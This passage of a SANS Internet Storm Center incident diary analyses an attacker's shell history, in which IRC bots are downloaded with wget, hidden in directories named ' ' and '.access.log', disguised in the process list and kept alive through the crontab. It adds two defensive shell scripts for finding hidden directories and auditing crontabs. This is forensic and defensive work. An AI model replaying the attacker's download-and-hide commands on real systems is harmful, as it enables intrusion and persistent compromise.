
./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there are no traces in the shell history file that would tell us either way.

In any case, Phase #3a follows: the attacker installs some goodies. virus.tar isn't really a virus; it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses nano to edit the bot's start and install scripts, which suggests that he isn't all that experienced on Unix: a seasoned Unix hand would most likely use vi, because vi is present on practically every Unix flavor and version, whereas nano is not. Note also how he names the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual look at the process list.
/sbin/ifconfig -a | grep inet
wget http://f......com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution
Phase #3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory named " " (a single space), and unpacks the bot beneath it into a directory called .access.log, a name chosen to look like a stray log file. Both are easy to miss in a casual ls. If you want to search your system for directories named with a single space, try this (the space must be quoted, otherwise find gets no -name argument at all):

# find / -name " "
mkdir " "
cd " "
ls -a
wget http://c.......org/egg.tgz
cd
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd
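As an added example (my own, not part of the diary), here is a small POSIX shell script that generalises the find command above: it walks a tree and reports directory names chosen to be overlooked. It covers both tricks in this history, the " " directory and the .access.log dot-directory named like a file, and also the "..." naming trick, which is my assumption and not something the diary shows. The fixture tree it builds is constructed for the demo; on a live system run it against / instead.

```shell
#!/bin/sh
# Added example, not from the ISC diary: report directories whose names are
# chosen to be overlooked. Covers the two tricks in the attacker's history
# (a directory named " " and a dot-directory named ".access.log") plus the
# "..." naming trick, which is assumed here and not shown on the page.

# Print a reason if a directory name looks deliberately inconspicuous,
# else return 1. Pure POSIX sh so it runs on any Unix flavor.
classify_name() {
    case $1 in
        '') return 1 ;;
        *[![:space:]]*) ;;                       # has a visible char: try the other rules
        *) echo "whitespace-only name"; return 0 ;;
    esac
    case $1 in
        .[!.]*.[!.]*) echo "hidden directory named like a file"; return 0 ;;
    esac
    case $1 in
        *[!.]*) ;;                               # not all dots
        ...*) echo "name is only dots"; return 0 ;;
    esac
    return 1
}

# Walk ROOT and print "<reason>\t'<path>'" for each odd directory.
# Caveat: newline-delimited, so a name containing a newline would be mis-split.
find_odd_dirs() {
    find "$1" -type d 2>/dev/null | while IFS= read -r d; do
        name=${d##*/}
        if reason=$(classify_name "$name"); then
            printf "%s\t'%s'\n" "$reason" "$d"    # quotes make the space visible
        fi
    done
    return 0
}

count_odd_dirs() { find_odd_dirs "$1" | wc -l | tr -d '[:space:]'; }

# Constructed fixture tree mirroring the diary: home/user/" "/.access.log/scripts,
# plus some ordinary directories that must not be flagged.
make_fixture() {
    base=$(mktemp -d)
    mkdir -p "$base/home/user/ /.access.log/scripts"
    mkdir -p "$base/home/user/.ssh" "$base/home/user/..." "$base/var/log/apache2"
    printf '%s\n' "$base"
}

# Usage on a live system: sh find_odd_dirs.sh /
if [ $# -gt 0 ]; then find_odd_dirs "$1"; fi
```

The dot-directory rule only fires on names with a second dot (.access.log, not .ssh or .config), which keeps false positives low, but treat every hit as a lead to inspect, not proof of compromise.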


Phase #4: The attacker wants to make sure that access can be regained, and edits the crontab so that some of his processes get restarted automatically on a schedule. The history records only that the crontab was edited, not what was put into it, so the crontab itself has to be checked.
crontab -l
crontab -e
exit
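As an added example (my own, not from the diary), the script below audits crontab text for the kind of entry this phase produces: jobs that restart something from a hidden or whitespace-named directory, from world-writable temp space, or at every boot. The sample crontab it checks is constructed for the demo; the real contents of the attacker's crontab -e were not recovered from the history file, so the paths below merely mirror the " " and .access.log directories seen earlier.

```shell
#!/bin/sh
# Added example, not from the ISC diary: flag crontab entries that look like
# intruder persistence (bots restarted from odd or hidden directories, jobs in
# world-writable temp space, @reboot hooks). Reads crontab text on stdin and
# prints "<reasons>\t<entry>" for every suspicious line.

audit_crontab() {
    while IFS= read -r line; do
        case $line in
            ''|\#*|[A-Za-z_]*=*) continue ;;   # blank, comment, or VAR=value line
        esac
        reasons=""
        if printf '%s\n' "$line" | grep -Eq '^@reboot[[:space:]]'; then
            reasons="${reasons}runs at every boot; "
        fi
        if printf '%s\n' "$line" | grep -Eq '(^|[^[:alnum:]/])(/tmp|/var/tmp|/dev/shm)/'; then
            reasons="${reasons}command under world-writable temp dir; "
        fi
        if printf '%s\n' "$line" | grep -Eq '/\.[^/[:space:]]+/'; then
            reasons="${reasons}path goes through a hidden (dot) directory; "
        fi
        if printf '%s\n' "$line" | grep -Eq '/[[:space:]]+/'; then
            reasons="${reasons}path component that is only whitespace; "
        fi
        if [ -n "$reasons" ]; then
            printf '%s\t%s\n' "${reasons%; }" "$line"
        fi
    done
    return 0
}

# Constructed sample crontab (not the one from the incident); the bot paths
# mirror the " " and .access.log directories seen in the shell history.
SAMPLE_CRONTAB='# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/10 * * * * "/home/user/ /.access.log/eggdrop" -m "/home/user/ /.access.log/bot1.conf"
@reboot cd /home/user/virus && ./start Evolution
*/5 * * * * /tmp/.x/run >/dev/null 2>&1
15 2 * * 0 /usr/local/bin/backup.sh'

audit_sample() { printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab; }

# On a live system, check every user's crontab and the system cron files
# (crontab -u is the standard Vixie/ISC cron option):
#   for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null | audit_crontab; done
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | audit_crontab
if [ $# -gt 0 ]; then audit_crontab < "$1"; fi
```

Against the sample, the apt-get and backup jobs pass while the two bot restarts and the /tmp job are reported, each with every reason that applies; an entry reported here still needs the referenced binary looked at before concluding anything.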


(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.